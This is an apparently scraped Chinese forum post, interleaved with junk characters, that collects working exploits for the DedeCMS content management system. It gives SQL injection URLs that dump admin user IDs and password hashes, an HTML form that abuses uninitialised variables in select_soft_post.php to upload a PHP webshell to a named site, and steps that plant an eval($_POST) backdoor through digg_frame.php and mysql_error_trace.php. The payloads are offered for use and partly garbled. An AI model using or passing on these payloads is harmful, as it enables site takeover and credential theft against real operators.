! _* |* i* _1 _http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" [6 t8 j0 a; F* P3 {% R7 q4 z) W1 U2 f4 i# Z

$ }* I; q$ b% o6 c$ P+ H* |  c" u$ B2 l
7 A7 j$ b) q+ B3 g; v7 I( c

  _0 `) a, ?) `6 h! o4 q$ x. {9 R  L- j, {5 U' `' K

" J4 g3 P4 _, \0 M+ d
- e2 Y  ^$ Z1 ]1 i6 l
; o8 e1 T  O! g. y2 o% `: N- Y& m- `/ |4 D! a. D
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞+ J# A$ x9 ~0 c6 Y, k( v  T
<html>
3 W$ B5 B' t) J/ }<head>
+ S6 K$ k! p- _4 k3 Y, q<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>2 K" q% |2 {6 Z7 b6 L
</head>
6 s9 ?0 Q# g7 @' K0 n/ v<body style="FONT-SIZE: 9pt">- M$ g' |2 K" p
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. y2 ]) t6 d" L' J) S! g( z% B
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>. ]+ F$ E0 D; |
<input type='hidden' name='activepath' value='/data/cache/' />0 t3 z+ e9 Y  f, A4 o
<input type='hidden' name='cfg_basedir' value='../../' />% m6 E- G; [7 r9 |6 C
<input type='hidden' name='cfg_imgtype' value='php' />
9 @# l9 T4 X4 [7 F5 h8 T8 C, [<input type='hidden' name='cfg_not_allowall' value='txt' />
- h4 b0 o' C# `9 Q$ b) J) K4 G' @8 O<input type='hidden' name='cfg_softtype' value='php' />3 s) Y( k7 k! M! R' u& G. o. a
<input type='hidden' name='cfg_mediatype' value='php' />
3 W/ W6 f4 M: I<input type='hidden' name='f' value='form1.enclosure' />
9 w& d/ R. v  \<input type='hidden' name='job' value='upload' />( B- G; r- ]: Z9 w) q+ C3 A; j
<input type='hidden' name='newname' value='fly.php' />
! W" y0 D2 I6 l2 u  T* U# a/ DSelect U Shell <input type='file' name='uploadfile' size='25' />. o" _- `- ]- l  X' }0 m$ w
<input type='submit' name='sb1' value='确定' />6 n) b0 O% @+ M
</form>
( H0 l2 f0 h. ^! N<br />It's just a exp for the bug of Dedecms V55...<br />7 ^$ d" T- N3 l3 q
Need register_globals = on...<br />
% H" L: r7 E* Y* P  l) p* dFun the game,get a webshell at /data/cache/fly.php...<br />; ~9 l2 G2 F4 ~1 ]3 K7 @; [
</body>
* n! E$ T6 G& z</html>! I* x* E7 S8 w

0 t" C2 w' q" B9 M/ Q8 o+ T4 C" e# r4 i" V) f0 H! \  J: ?5 ^
+ S: `+ h0 B- Y3 x7 R1 h- c

) N: l. ?: K. e5 z1 f# Z7 E
2 f7 @& N9 q8 q) `5 n% A7 _( C
) U7 |. B, [( e! X7 j6 O6 C" M! o3 W8 T
3 @' u' E; _; z7 `
: N1 l9 p& u' q/ W8 E' G

7 n1 U9 p  L" S$ ^% k. T0 N5 T/ [& u织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
" ?$ i. V3 M* @利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
3 a3 S% m: Z* D4 i. M, w: {8 q! h3 n1. 访问网址:9 I% Q  K) s$ u' |  s1 p( V
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
$ V) {/ L' [# K! b) H1 x可看见错误信息
3 @! T6 |  _) T& F7 z
9 l: i. _3 ^: Y( q4 L3 `
: w, `7 K% w# r1 m" W2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。: k- N9 R: F- d
int(3) Error: Illegal double '1024e1024' value found during parsing
; R* s) P2 Y) I7 A/ w  XError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
* r2 \5 ]# P) f: H% Q! l
6 ~" K7 I) j" E7 o
+ B- Z. z! G& `3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
, e! J0 g3 h# a; q- K/ M: x3 ?: s0 U* ?- X7 B- F5 _, L+ ^

5 Q" q5 g2 r3 b  `<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>& L2 V4 V: z: m* C& r0 s5 U8 B5 b
9 [* T4 f& q, \  r" |, _' o

, }7 k: @9 Q0 m  J按确定后的看到第2步骤的信息表示文件木马上传成功." }# A9 @/ ], y5 t

- y( k/ R" k! z5 X, f: F5 K7 i1 w0 H4 D1 @$ M# ]
  l# r. m: O% `6 x9 b" E% a
# {$ @5 t( d+ x; H8 f! s2 f* b

1 F2 `. I1 Y# ?6 U  t% f: c  s+ s
# |& b8 `! I7 i0 F- p, w/ c* V; @
) o* E0 X) U( r3 J0 _* v- H. A) N8 P
; m" E  r2 y6 C2 x4 B/ E2 \$ P
1 k% J; g/ c6 U; }: A" i5 H

  i9 U' b) [. Z2 h7 D. Y8 l$ t8 f! `8 I# ?# Q7 @! Z8 U7 r
织梦(DedeCms)plus/infosearch.php 文件注入漏洞6 I2 Q, \( e* r3 f$ g
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表